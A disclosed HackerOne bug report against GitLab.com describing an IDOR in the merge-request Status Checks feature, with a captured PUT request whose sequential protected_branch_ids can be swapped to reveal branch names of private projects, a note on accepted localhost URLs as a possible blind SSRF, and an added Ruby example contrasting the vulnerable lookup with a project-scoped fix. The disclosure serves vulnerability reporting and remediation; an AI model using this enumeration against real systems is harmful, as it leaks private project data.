IDOR in setting status check of merge request allows adding protected branches of private projects and discloses the branch names
HackerOne report #1294017 by ashish_r_padelkar
on 2021-08-06, assigned to GitLab Team:
Report
Summary
Hello,
There is a new feature, currently available only on gitlab.com, at https://gitlab.com/<GroupName>/<ProjectName>/edit in the Merge Request section, named Status Checks.
While adding a new status check, the request is vulnerable to IDOR for branch names. If you just replace the IDs of branches, you can set/get their names even if they belong to a private project where you don't have any access. The IDs are sequential, so you can easily obtain the names in bulk.
Steps to reproduce
- Login as a maintainer in your project and go to https://gitlab.com/<GroupName>/<ProjectName>/edit, in the Merge Request section, and click on the Add Status Check button.
- Add your inputs (allows adding localhost URLs too; I am bringing this to your attention as normally GitLab won't allow localhost URLs). Select your branch in the branch dropdown and add. Capture the request like below.
PUT /api/v4/projects/23887195/external_status_checks/50 HTTP/2
Host: gitlab.com
Cookie: 1
Content-Length: 120
Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
Accept: application/json, text/plain, */*
X-Csrf-Token: 1
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/privategroup4321/githubimport/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"external_url":"http://127.0.0.1/","id":50,"name":"Anything","protected_branch_ids":[41438448]}
- Just replace the value of protected_branch_ids in the above request with any protected branch ID that may belong to a private project that you don't have access to. These IDs are sequential.
- Send the request and you can see the protected branch name in the response as well as in the UI.
- This way you can obtain protected branch names of any project irrespective of their visibility!
What is the current bug behavior?
Able to fetch protected branch names of private projects and create a status check using those.
What is the expected correct behavior?
Only branches belonging to the project should be added in the status check.
Output of checks
This bug happens on GitLab.com GitLab Enterprise Edition 14.2.0-pre 62864aa6970
As mentioned above, this feature is not yet available in local installations.
Regards,
Ashish
Impact
Able to fetch protected branch names of private projects and create a status check using those.
The request also takes a URL as an input and it allows adding localhost URLs such as http://127.0.0.1. I am currently not sure whether this is vulnerable to Blind SSRF as this feature is not available on local installations yet. The request to this URL is sent when the merge request is updated.
I would have checked for SSRF too if the feature was available locally, but I will update about this later whenever the feature is available on local installations and if it's vulnerable to blind SSRF.
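The expected behaviour stated above (only the project's own protected branches may be attached to a status check), as an added example that is not GitLab's code: a constructed Ruby model of the lookup behind protected_branch_ids, with the unscoped lookup that causes the IDOR beside a lookup scoped to the current project that rejects foreign ids. The project id and first branch id are taken from the captured request; the second branch, its project id and all names are constructed fixture data.

```ruby
# Added example, not GitLab code: models the resolution of the
# protected_branch_ids parameter from the status-check PUT request.
ProtectedBranch = Struct.new(:id, :project_id, :name)
Project = Struct.new(:id, :path)

# Constructed fixture data. 23887195 / 41438448 come from the captured
# request; 55555555 stands for an unrelated private project.
ALL_PROTECTED_BRANCHES = [
  ProtectedBranch.new(41438448, 23887195, "main"),
  ProtectedBranch.new(41438449, 55555555, "release/unannounced-product"),
].freeze

class UnauthorizedBranchError < StandardError; end

# Vulnerable shape: ids are resolved against every protected branch in
# the instance, so a caller who increments the sequential id learns the
# name of a branch in a project they cannot otherwise see.
def resolve_branches_global(ids)
  ids = ids.map(&:to_i)
  ALL_PROTECTED_BRANCHES.select { |b| ids.include?(b.id) }
end

# Hardened shape: the lookup is scoped to the project the request is
# being made against, and any id that does not resolve inside that
# scope is rejected outright rather than silently dropped. The error
# carries no branch name, so a foreign id reveals nothing.
def resolve_branches_scoped(project, ids)
  ids = ids.map(&:to_i).uniq
  found = ALL_PROTECTED_BRANCHES.select do |b|
    b.project_id == project.id && ids.include?(b.id)
  end
  missing = ids - found.map(&:id)
  unless missing.empty?
    raise UnauthorizedBranchError,
          "protected_branch_ids contains ids not in project #{project.id}"
  end
  found
end

# Mirrors the status-check update: returns the names that would be
# echoed back in the API response and rendered in the UI.
def status_check_branch_names(project, ids)
  resolve_branches_scoped(project, ids).map(&:name)
end
```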
How To Reproduce
Please add reproducibility information to this section: